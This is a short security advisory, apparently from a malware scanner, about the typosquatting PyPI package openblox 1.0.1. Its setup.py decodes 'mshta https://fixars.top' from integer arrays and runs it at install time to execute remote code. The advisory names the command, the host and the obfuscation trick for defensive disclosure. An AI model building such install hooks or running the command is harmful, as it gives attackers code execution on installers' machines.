openblox @1.0.1

Summary

setup.py invokes GetGitCommitHash() unconditionally at module top level, so it runs on pip install openblox (and any setuptools invocation). On Windows the function builds its command via two helpers (GetDefaultSystemPolicy, CalculateNodeDrift) that reconstruct strings from integer arrays using chr(byte + 14); the arrays decode to mshta and https://fixars.top . The resulting command is passed to subprocess.check_output with shell=True, causing Windows installers to launch mshta https://fixars.top — the mshta.exe Living-Off-The-Land binary downloads and executes remote HTA/JScript, giving the operator arbitrary code execution on the installer's machine. The obfuscation (chr-arithmetic with helper functions falsely named for hardware/latency diagnostics) exists solely to hide the URL and binary name from static scanners. The package additionally exhibits a cover-story shape: it is published under the name openblox with a Roblox-themed description, but the actual code is an unrelated sqligen SQLite utility, with placeholder author metadata (John / john@example.com / github.com/john/sqligen). The Roblox-library name appears chosen to attract installs intended for the legitimate openblox API library.

Source: amazon-inspector (cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201)